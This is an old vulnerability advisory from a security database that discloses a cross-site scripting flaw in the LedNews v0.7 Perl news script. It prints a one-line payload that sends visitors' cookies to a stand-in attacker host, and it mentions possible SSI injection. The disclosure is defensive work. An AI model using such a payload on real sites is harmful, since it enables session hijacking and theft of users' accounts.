XSS Vulnerability in LedNews (CGI/Perl) v0.7

Type securityvulns
Reporter Securityvulns
Modified 2003-06-21T00:00:00


XSS Vulnerability in LedNews (CGI/Perl) v0.7

URL: http://www.ledscripts.com/index.php?page=free:perl:lednews


LedNews is a CGI application written entirely in perl. Its designed to be as simple as possible, but very powerful at the same thing.


The script does not attempt to filter out javascript or any other HTML tags. So the posting message :

<script> document.location.replace('http://evil-haxor.com/cgi-bin/cookiemonster.cgi?'+document.cookie); </script>

as news will send cookies to your CGI script.

P.S.: It may also be possible to put SSI tags in news posts, since the script does not seem to do the usual filtering for them. I did not test this because i'm to lazy to install SSI on my system.

About me

I'm gilbert from Team UEC. I'm 16 years old. I dream about a job in security someday. This is my first time posting a vulnerability. I can always be contacted at gilbert_vilvoorde@hotmail.com

Thank you for reading this and have a nice day,


STOP MORE SPAM with the new MSN 8 and get 2 months FREE* http://join.msn.com/?page=features/junkmail